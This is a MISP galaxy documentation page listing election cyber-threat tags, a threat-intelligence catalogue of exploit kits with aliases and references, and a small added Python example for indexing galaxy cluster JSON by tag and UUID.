Tampering with registrations

The tag is: misp-galaxy:guidelines="Tampering with registrations"

Table 1552. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of party/campaign registration, causing them to miss the deadline

DoS or overload of party/campaign registration, causing them to miss the deadline

The tag is: misp-galaxy:guidelines="DoS or overload of party/campaign registration, causing them to miss the deadline"

Table 1553. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Fabricated signatures from sponsor

Fabricated signatures from sponsor

The tag is: misp-galaxy:guidelines="Fabricated signatures from sponsor"

Table 1554. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Identity fraud during voter registration

Identity fraud during voter registration

The tag is: misp-galaxy:guidelines="Identity fraud during voter registration"

Table 1555. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Deleting or tampering with voter data

Deleting or tampering with voter data

The tag is: misp-galaxy:guidelines="Deleting or tampering with voter data"

Table 1556. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of voter registration system, suppressing voters

DoS or overload of voter registration system, suppressing voters

The tag is: misp-galaxy:guidelines="DoS or overload of voter registration system, suppressing voters"

Table 1557. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking candidate laptops or email accounts

Hacking candidate laptops or email accounts

The tag is: misp-galaxy:guidelines="Hacking candidate laptops or email accounts"

Table 1558. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites (defacement, DoS)

Hacking campaign websites (defacement, DoS)

The tag is: misp-galaxy:guidelines="Hacking campaign websites (defacement, DoS)"

Table 1559. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Misconfiguration of a website

Misconfiguration of a website

The tag is: misp-galaxy:guidelines="Misconfiguration of a website"

Table 1560. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Leak of confidential information

Leak of confidential information

The tag is: misp-galaxy:guidelines="Leak of confidential information"

Table 1561. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking/misconfiguration of government servers, communication networks, or endpoints

Hacking/misconfiguration of government servers, communication networks, or endpoints

The tag is: misp-galaxy:guidelines="Hacking/misconfiguration of government servers, communication networks, or endpoints"

Table 1562. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results

Hacking government websites, spreading misinformation on the election process, registered parties/candidates, or results

The tag is: misp-galaxy:guidelines="Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results"

Table 1563. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of government websites

DoS or overload of government websites

The tag is: misp-galaxy:guidelines="DoS or overload of government websites"

Table 1564. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of voting and/or vote confidentiality during or after the elections

Tampering or DoS of voting and/or vote confidentiality during or after the elections

The tag is: misp-galaxy:guidelines="Tampering or DoS of voting and/or vote confidentiality during or after the elections"

Table 1565. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Software bug altering results

Software bug altering results

The tag is: misp-galaxy:guidelines="Software bug altering results"

Table 1566. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with logs/journals

Tampering with logs/journals

The tag is: misp-galaxy:guidelines="Tampering with logs/journals"

Table 1567. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Breach of voters privacy during the casting of votes

Breach of voters privacy during the casting of votes

The tag is: misp-galaxy:guidelines="Breach of voters privacy during the casting of votes"

Table 1568. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS or overload of the systems used for counting or aggregating results

Tampering, DoS or overload of the systems used for counting or aggregating results

The tag is: misp-galaxy:guidelines="Tampering, DoS or overload of the systems used for counting or aggregating results"

Table 1569. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of communication links uesd to transfer (interim) results

The tag is: misp-galaxy:guidelines="Tampering or DoS of communication links uesd to transfer (interim) results"

Table 1570. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with supply chain involved in the movement or transfer data

Tampering with supply chain involved in the movement or transfer data

The tag is: misp-galaxy:guidelines="Tampering with supply chain involved in the movement or transfer data"

Table 1571. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking of internal systems used by media or press

Hacking of internal systems used by media or press

The tag is: misp-galaxy:guidelines="Hacking of internal systems used by media or press"

Table 1572. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering, DoS, or overload of media communication links

The tag is: misp-galaxy:guidelines="Tampering, DoS, or overload of media communication links"

Table 1573. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Defacement, DoS or overload of websites or other systems used for publication of the results

Defacement, DoS or overload of websites or other systems used for publication of the results

The tag is: misp-galaxy:guidelines="Defacement, DoS or overload of websites or other systems used for publication of the results"

Table 1574. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Exploit-Kit

Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits. It is not meant to be totally exhaustive but aims at covering the most seen in the past 5 years.

Exploit-Kit is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Kafeine - Will Metcalf - KahuSecurity

Astrum

Astrum Exploit Kit is a private exploit kit used in massive-scale malvertising campaigns. It is notable for its use of steganography to hide the exploit code inside image data served as ads.

The tag is: misp-galaxy:exploit-kit="Astrum"

Astrum is also known as:

  • Stegano EK

Table 1575. Table References

Links

http://malware.dontneedcoffee.com/2014/09/astrum-ek.html

http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/

Underminer

Underminer EK is an exploit kit that seems to be used privately against users in Asia. Functionalities: browser profiling and filtering, prevention of client revisits, URL randomisation, and asymmetric encryption of payloads.

The tag is: misp-galaxy:exploit-kit="Underminer"

Underminer is also known as:

  • Underminer EK

Table 1576. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-underminer-exploit-kit-delivers-bootkit-and-cryptocurrency-mining-malware-with-encrypted-tcp-tunnel/

http://bobao.360.cn/interref/detail/248.html

Fallout

Fallout Exploit Kit appeared at the end of August 2018 as an updated Nuclear Pack featuring current exploits seen in competing exploit kits.

The tag is: misp-galaxy:exploit-kit="Fallout"

Fallout is also known as:

  • Fallout

Fallout has relationships with:

  • dropped: misp-galaxy:ransomware="GandCrab" with estimative-language:likelihood-probability="almost-certain"

Table 1577. Table References

Links

https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html

https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/
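The tag strings (misp-galaxy:exploit-kit="Fallout") and relationship lines (dropped: misp-galaxy:ransomware="GandCrab" with estimative-language:likelihood-probability="almost-certain") printed for each cluster are derived from the galaxy cluster JSON that this document is generated from. The following Python is an added example, not code from the MISP project. It assumes the public galaxy cluster layout (a top-level "type", and a "values" list whose entries carry "value", "uuid", "meta.synonyms", "meta.refs" and optional "related" edges keyed by "dest-uuid"); the two abridged documents embedded below are constructed for the example, with fictional UUIDs, and are not the real exploit-kit.json or ransomware.json.

```python
"""Index MISP galaxy cluster JSON by tag, synonym and UUID, and follow relationships.

Added example (not MISP project code). Assumes the public galaxy cluster layout.
"""
import json
import re
from typing import Optional

# Constructed, abridged sample in the galaxy cluster layout (fictional UUIDs).
SAMPLE_CLUSTER_JSON = json.dumps({
    "name": "Exploit-Kit",
    "type": "exploit-kit",
    "authors": ["Kafeine", "Will Metcalf", "KahuSecurity"],
    "values": [
        {
            "value": "Fallout",
            "uuid": "00000000-0000-4000-8000-000000000001",
            "description": "Fallout Exploit Kit appeared at the end of August 2018.",
            "meta": {
                "refs": ["https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html"],
                "synonyms": ["Fallout"],
            },
            "related": [
                {
                    "dest-uuid": "00000000-0000-4000-8000-0000000000a1",
                    "type": "dropped",
                    "tags": ['estimative-language:likelihood-probability="almost-certain"'],
                }
            ],
        },
        {
            "value": "Astrum",
            "uuid": "00000000-0000-4000-8000-000000000002",
            "meta": {"synonyms": ["Stegano EK"], "refs": []},
        },
    ],
})

# Second constructed galaxy so the cross-galaxy edge above can be followed.
SAMPLE_RANSOMWARE_JSON = json.dumps({
    "name": "Ransomware",
    "type": "ransomware",
    "values": [
        {"value": "GandCrab", "uuid": "00000000-0000-4000-8000-0000000000a1", "meta": {}},
    ],
})

# Tag grammar used by MISP for galaxy clusters: misp-galaxy:<type>="<value>"
TAG_RE = re.compile(r'^misp-galaxy:(?P<type>[^=]+)="(?P<value>.+)"$')


def render_relationship(rel_type: str, dest_tag: str, qualifiers: list[str]) -> str:
    """Format an edge the way the generated galaxy pages print it."""
    line = f"{rel_type}: {dest_tag}"
    if qualifiers:
        line += " with " + ", ".join(qualifiers)
    return line


class GalaxyIndex:
    """Lookup tables over one or more loaded galaxy cluster documents."""

    def __init__(self) -> None:
        self.by_tag: dict[str, dict] = {}
        self.by_uuid: dict[str, dict] = {}
        self.by_alias: dict[str, str] = {}  # lower-cased value/synonym -> canonical tag

    @staticmethod
    def tag_for(galaxy_type: str, value: str) -> str:
        return f'misp-galaxy:{galaxy_type}="{value}"'

    def load(self, cluster_json: str) -> int:
        """Index every cluster in a galaxy document; returns the number loaded."""
        doc = json.loads(cluster_json)
        gtype = doc["type"]
        for raw in doc["values"]:
            tag = self.tag_for(gtype, raw["value"])
            entry = dict(raw, galaxy_type=gtype, tag=tag)
            self.by_tag[tag] = entry
            self.by_uuid[entry["uuid"]] = entry
            self.by_alias[entry["value"].lower()] = tag
            for syn in entry.get("meta", {}).get("synonyms", []):
                self.by_alias.setdefault(syn.lower(), tag)  # canonical value wins
        return len(doc["values"])

    def resolve(self, tag: str) -> Optional[dict]:
        """Return the cluster for a well-formed galaxy tag, else None."""
        return self.by_tag.get(tag) if TAG_RE.match(tag) else None

    def find_by_name(self, name: str) -> Optional[dict]:
        """Case-insensitive lookup by cluster value or synonym (e.g. 'Stegano EK')."""
        tag = self.by_alias.get(name.lower())
        return self.by_tag.get(tag) if tag else None

    def relationships(self, tag: str) -> list[tuple[str, str, list[str]]]:
        """(type, destination tag, qualifier tags) for every edge of a cluster.
        Edges whose dest-uuid is in a galaxy not yet loaded stay unresolved."""
        entry = self.resolve(tag)
        if entry is None:
            return []
        out = []
        for rel in entry.get("related", []):
            dest = self.by_uuid.get(rel["dest-uuid"])
            dest_tag = dest["tag"] if dest else f'unresolved:{rel["dest-uuid"]}'
            out.append((rel.get("type", "related-to"), dest_tag, rel.get("tags", [])))
        return out


if __name__ == "__main__":
    idx = GalaxyIndex()
    idx.load(SAMPLE_CLUSTER_JSON)
    idx.load(SAMPLE_RANSOMWARE_JSON)
    fallout = 'misp-galaxy:exploit-kit="Fallout"'
    for edge in idx.relationships(fallout):
        print(render_relationship(*edge))
```

Loading the ransomware galaxy before asking for Fallout's edges is what turns the dest-uuid into a readable tag; relationships are stored by UUID precisely so that they survive renames of the cluster value, which is also why a tag-only index is not enough to follow them.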

Bingo

Bingo EK is the name chosen by the defense for a Fiesta-like EK first spotted in March 2017 and, at that time, mostly targeting Russia.

The tag is: misp-galaxy:exploit-kit="Bingo"

Terror EK

Terror EK is built on Hunter, Sundown and RIG EK code

The tag is: misp-galaxy:exploit-kit="Terror EK"

Terror EK is also known as:

  • Blaze EK

  • Neptune EK

Table 1578. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit--More-like-Error-Exploit-Kit/

DealersChoice

DealersChoice is a Flash Player Exploit platform triggered by RTF.

DealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Networks researchers analysed two variants: variant A, a standalone variant that includes the Flash exploit code packaged with a payload, and variant B, a modular variant that loads exploit code on demand. This component appeared in 2016 and is still in use.

The tag is: misp-galaxy:exploit-kit="DealersChoice"

DealersChoice is also known as:

  • Sednit RTF EK

Table 1579. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/

http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

DNSChanger

DNSChanger Exploit Kit is an exploit kit targeting routers via the browser.

The tag is: misp-galaxy:exploit-kit="DNSChanger"

DNSChanger is also known as:

  • RouterEK

Table 1580. Table References

Links

http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

Novidade

Novidade Exploit Kit is an exploit kit targeting routers via the browser.

The tag is: misp-galaxy:exploit-kit="Novidade"

Novidade is also known as:

  • DNSGhost

Table 1581. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/

Disdain

Disdain EK was introduced on an underground forum on 2017-08-07. Its panel is stolen from Sundown, its URL patterns resemble Terror's and its obfuscation is reminiscent of Nebula.

The tag is: misp-galaxy:exploit-kit="Disdain"

Table 1582. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/

Kaixin

Kaixin is an exploit kit mainly seen behind compromised websites in Asia.

The tag is: misp-galaxy:exploit-kit="Kaixin"

Kaixin is also known as:

  • CK vip

Table 1583. Table References

Links

http://www.kahusecurity.com/2013/deobfuscating-the-ck-exploit-kit/

http://www.kahusecurity.com/2012/new-chinese-exploit-pack/

MWI

Microsoft Word Intruder is an exploit kit focused on Word and embedded Flash exploits. Its author does not want customers to use it in mass spam campaigns, so it is most often associated with semi-targeted attacks.

The tag is: misp-galaxy:exploit-kit="MWI"

Table 1585. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-microsoft-word-intruder-revealed.pdf

ThreadKit

ThreadKit is the name given to a widely used Microsoft Office document exploit builder kit that appeared in June 2017

The tag is: misp-galaxy:exploit-kit="ThreadKit"

Table 1586. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware

VenomKit

VenomKit is the name given to a kit sold since April 2017 as a "Word 1day exploit builder" by the user badbullzvenom. The author only allows its use in targeted campaigns. It is used, for instance, by the "Cobalt Gang".

The tag is: misp-galaxy:exploit-kit="VenomKit"

VenomKit is also known as:

  • Venom

Table 1587. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

Taurus Builder

Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user "badbullzvenom".

The tag is: misp-galaxy:exploit-kit="Taurus Builder"

RIG

RIG is an exploit kit whose source derives from Infinity EK, itself an evolution of Redkit. It became dominant after the fall of Angler and Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 while it was only accessible to "vip" customers and RIG 3 was still in use.

The tag is: misp-galaxy:exploit-kit="RIG"

RIG is also known as:

  • RIG 3

  • RIG-v

  • RIG 4

  • Meadgive

Table 1588. Table References

Links

http://www.kahusecurity.com/2014/rig-exploit-pack/

https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Reloaded---Examining-the-Architecture-of-RIG-Exploit-Kit-3-0/

https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/

http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

Spelevo

Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK

The tag is: misp-galaxy:exploit-kit="Spelevo"

Table 1589. Table References

Links

https://twitter.com/kafeine/status/1103649040800145409

Sednit EK

Sednit EK is the exploit kit used by APT28

The tag is: misp-galaxy:exploit-kit="Sednit EK"

Sednit EK is also known as:

  • SedKit

Table 1590. Table References

Links

http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

Sundown-P

Sundown-P/Sundown-Pirate is a rip-off of Sundown used privately (by a single group). First spotted at the end of June 2017, it was branded CaptainBlack in August 2017.

The tag is: misp-galaxy:exploit-kit="Sundown-P"

Sundown-P is also known as:

  • Sundown-Pirate

  • CaptainBlack

Table 1591. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/promediads-malvertising-sundown-pirate-exploit-kit/

Bizarro Sundown

Bizarro Sundown appears to be a fork of Sundown with added anti-analysis features

The tag is: misp-galaxy:exploit-kit="Bizarro Sundown"

Bizarro Sundown is also known as:

  • Sundown-b

Table 1592. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/

https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/

Hunter

Hunter EK is an evolution of 3Ros EK

The tag is: misp-galaxy:exploit-kit="Hunter"

Hunter is also known as:

  • 3ROS Exploit Kit

Hunter has relationships with:

  • similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"

Table 1593. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/Hunter-Exploit-Kit-Targets-Brazilian-Banking-Customers

GreenFlash Sundown

GreenFlash Sundown is a variation of Bizarro Sundown without a landing page.

The tag is: misp-galaxy:exploit-kit="GreenFlash Sundown"

GreenFlash Sundown is also known as:

  • Sundown-GF

Table 1594. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/

Angler

The Angler Exploit Kit was the most popular and most advanced exploit kit from 2014 to mid-2016. There were several variations: the historical "indexm" variant used to spread Lurk, a VIP version used notably to spread Poweliks, the "standard" commercial version, and a variant tied to load selling (mostly bankers) that can be associated with EmpirePPC.

The tag is: misp-galaxy:exploit-kit="Angler"

Angler is also known as:

  • XXX

  • AEK

  • Axpergle

Table 1595. Table References

Links

https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/

http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html

http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html

Archie

Archie EK

The tag is: misp-galaxy:exploit-kit="Archie"

Table 1596. Table References

Links

https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit

BlackHole

The BlackHole Exploit Kit was the most popular exploit kit from 2011 to 2013. Its activity stopped with Paunch's arrest (all activity since then is anecdotal and based on an old leak).

The tag is: misp-galaxy:exploit-kit="BlackHole"

BlackHole is also known as:

  • BHEK

BlackHole has relationships with:

  • similar: misp-galaxy:rat="BlackHole" with estimative-language:likelihood-probability="likely"

Table 1597. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Blackhole-Exploit-Kit-v2/

https://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/

Bleeding Life

Bleeding Life is an exploit kit that became open source with its version 2

The tag is: misp-galaxy:exploit-kit="Bleeding Life"

Bleeding Life is also known as:

  • BL

  • BL2

Table 1598. Table References

Links

http://www.kahusecurity.com/2011/flash-used-in-idol-malvertisement/

http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html

Cool

The Cool Exploit Kit was a kind of BlackHole VIP in 2012/2013

The tag is: misp-galaxy:exploit-kit="Cool"

Cool is also known as:

  • CEK

  • Styxy Cool

Table 1599. Table References

Links

http://malware.dontneedcoffee.com/2012/10/newcoolek.html

http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html

http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/

Fiesta

Fiesta Exploit Kit

The tag is: misp-galaxy:exploit-kit="Fiesta"

Fiesta is also known as:

  • NeoSploit

  • Fiexp

Table 1600. Table References

Links

http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an

http://www.kahusecurity.com/2011/neosploit-is-back/

Empire

The Empire Pack is a variation of RIG operated by a load seller. It’s being fed by many traffic actors

The tag is: misp-galaxy:exploit-kit="Empire"

Empire is also known as:

  • RIG-E

Empire has relationships with:

  • similar: misp-galaxy:tool="Empire" with estimative-language:likelihood-probability="likely"

Table 1601. Table References

Links

http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

FlashPack

FlashPack EK has had multiple forks. The most common variant seen was the standalone Flash version.

The tag is: misp-galaxy:exploit-kit="FlashPack"

FlashPack is also known as:

  • FlashEK

  • SafePack

  • CritXPack

  • Vintage Pack

Table 1602. Table References

Links

http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html

http://malware.dontneedcoffee.com/2013/04/meet-safe-pack-v20-again.html

Glazunov

Glazunov is an exploit kit mainly seen behind compromised websites in 2012 and 2013. The Glazunov compromise activity is likely the ancestor of what became EITest in July 2014. Sibhost and Flimkit later showed similarities with this exploit kit.

The tag is: misp-galaxy:exploit-kit="Glazunov"

Table 1603. Table References

Links

https://nakedsecurity.sophos.com/2013/06/24/taking-a-closer-look-at-the-glazunov-exploit-kit/

GrandSoft

GrandSoft Exploit Kit was a fairly common exploit kit in 2012/2013. It disappeared between March 2014 and September 2017.

The tag is: misp-galaxy:exploit-kit="GrandSoft"

GrandSoft is also known as:

  • StampEK

  • SofosFO

Table 1604. Table References

Links

http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html

http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html

https://nakedsecurity.sophos.com/2012/08/24/sophos-sucks-malware/

HanJuan

HanJuan EK was a variation of Angler EK fed by a single actor and used in advanced malvertising chains targeting the USA. It used a 0-day (CVE-2015-0313) from the beginning of December 2014 until the beginning of February 2015.

The tag is: misp-galaxy:exploit-kit="HanJuan"

Table 1605. Table References

Links

http://www.malwaresigs.com/2013/10/14/unknown-ek/

https://blog.malwarebytes.com/threat-analysis/2014/08/shining-some-light-on-the-unknown-exploit-kit/

http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-exploit-kit-in-cve-2015-0313-attack

https://twitter.com/kafeine/status/562575744501428226

Himan

Himan Exploit Kit

The tag is: misp-galaxy:exploit-kit="Himan"

Himan is also known as:

  • High Load

Table 1606. Table References

Links

http://malware.dontneedcoffee.com/2013/10/HiMan.html

Impact

Impact EK

The tag is: misp-galaxy:exploit-kit="Impact"

Table 1607. Table References

Links

http://malware.dontneedcoffee.com/2012/12/inside-impact-exploit-kit-back-on-track.html

Infinity

Infinity is an evolution of Redkit

The tag is: misp-galaxy:exploit-kit="Infinity"

Infinity is also known as:

  • Redkit v2.0

  • Goon

Table 1608. Table References

Links

http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html

http://www.kahusecurity.com/2014/the-resurrection-of-redkit/

Lightsout

Lightsout Exploit Kit has been used in watering hole attacks performed by the Havex APT group.

The tag is: misp-galaxy:exploit-kit="Lightsout"

Table 1609. Table References

Links

http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html

http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html

http://malwageddon.blogspot.fr/2013/09/unknown-ek-by-way-how-much-is-fish.html

Nebula

Nebula Exploit Kit has been built on Sundown source and features an internal TDS

The tag is: misp-galaxy:exploit-kit="Nebula"

Table 1610. Table References

Links

http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html

Neutrino

Neutrino Exploit Kit was one of the major exploit kits from its launch in 2013 until September 2016, when it went private (the defenders' name for this variation is Neutrino-v). This EK vanished from March 2014 until November 2014.

The tag is: misp-galaxy:exploit-kit="Neutrino"

Neutrino is also known as:

  • Job314

  • Neutrino Rebooted

  • Neutrino-v

Neutrino has relationships with:

  • similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

Table 1611. Table References

Links

http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

Niteris

Niteris was used mainly to target Russian users.

The tag is: misp-galaxy:exploit-kit="Niteris"

Niteris is also known as:

  • CottonCastle

Table 1612. Table References

Links

http://malware.dontneedcoffee.com/2014/06/cottoncastle.html

http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html

Nuclear

The Nuclear Pack appeared in 2009 and has been one of the longest-lived exploit kits. Spartan EK was a variation of Nuclear Pack without a landing page.

The tag is: misp-galaxy:exploit-kit="Nuclear"

Nuclear is also known as:

  • NEK

  • Nuclear Pack

  • Spartan

  • Neclu

Table 1613. Table References

Links

http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/

Phoenix

Phoenix Exploit Kit

The tag is: misp-galaxy:exploit-kit="Phoenix"

Phoenix is also known as:

  • PEK

Table 1614. Table References

Links

http://malwareint.blogspot.fr/2010/09/phoenix-exploits-kit-v21-inside.html

http://blog.trendmicro.com/trendlabs-security-intelligence/now-exploiting-phoenix-exploit-kit-version-2-5/

Private Exploit Pack

Private Exploit Pack

The tag is: misp-galaxy:exploit-kit="Private Exploit Pack"

Private Exploit Pack is also known as:

  • PEP

Table 1615. Table References

Links

http://malware.dontneedcoffee.com/2013/07/pep-new-bep.html

http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html

Redkit

Redkit was a major exploit kit in 2012. One of its specific features was to grant access in exchange for a percentage of the customer's traffic.

The tag is: misp-galaxy:exploit-kit="Redkit"

Table 1616. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Wild-Exploit-Kit-Appears----Meet-RedKit/

http://malware.dontneedcoffee.com/2012/05/inside-redkit.html

https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/

Sakura

Sakura Exploit Kit appeared in 2012 and was adopted by several big actors.

The tag is: misp-galaxy:exploit-kit="Sakura"

Table 1617. Table References

Links

http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html

SPL

SPL exploit kit was mainly seen in 2012/2013 most often associated with ZeroAccess and Scareware/FakeAV

The tag is: misp-galaxy:exploit-kit="SPL"

SPL is also known as:

  • SPL_Data

  • SPLNet

  • SPL2

Table 1618. Table References

Links

http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/

Sundown

Sundown Exploit Kit is mainly built out of stolen code from other exploit kits

The tag is: misp-galaxy:exploit-kit="Sundown"

Sundown is also known as:

  • Beps

  • Xer

  • Beta

Table 1619. Table References

Links

http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html

https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road

Sweet-Orange

Sweet Orange

The tag is: misp-galaxy:exploit-kit="Sweet-Orange"

Sweet-Orange is also known as:

  • SWO

  • Anogre

Table 1620. Table References

Links

http://malware.dontneedcoffee.com/2012/12/juice-sweet-orange-2012-12.html

WhiteHole

WhiteHole Exploit Kit appeared in January 2013 in the wake of CVE-2013-0422.

The tag is: misp-galaxy:exploit-kit="WhiteHole"

Table 1622. Table References

Links

http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html

Unknown

Unknown Exploit Kit. This is a place holder for any undocumented Exploit Kit. If you use this tag, we will be more than happy to give the associated EK a deep look.

The tag is: misp-galaxy:exploit-kit="Unknown"

Table 1623. Table References

Links

https://twitter.com/kafeine

https://twitter.com/node5

https://twitter.com/kahusecurity

SpelevoEK

The Spelevo exploit kit seems to have similarities to SPL EK, which is a different exploit kit.

The tag is: misp-galaxy:exploit-kit="SpelevoEK"

Table 1624. Table References

Links

https://cyberwarzone.com/what-is-the-spelevo-exploit-kit/

FIRST DNS Abuse Techniques Matrix

The Domain Name System (DNS) is a critical part of the Internet, including mapping domain names to IP addresses. Malicious threat actors use domain names, their corresponding technical resources, and other parts of the DNS infrastructure, including its protocols, for their malicious cyber operations. CERTs are confronted with reported DNS abuse on a continuous basis, and rely heavily on DNS analysis and infrastructure to protect their constituencies. Understanding the international customary norms applicable for detecting and mitigating DNS abuse from the perspective of the global incident response community is critical for the open Internet's stability, security and resiliency. See also https://www.first.org/global/sigs/dns/ for more information.

FIRST DNS Abuse Techniques Matrix is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

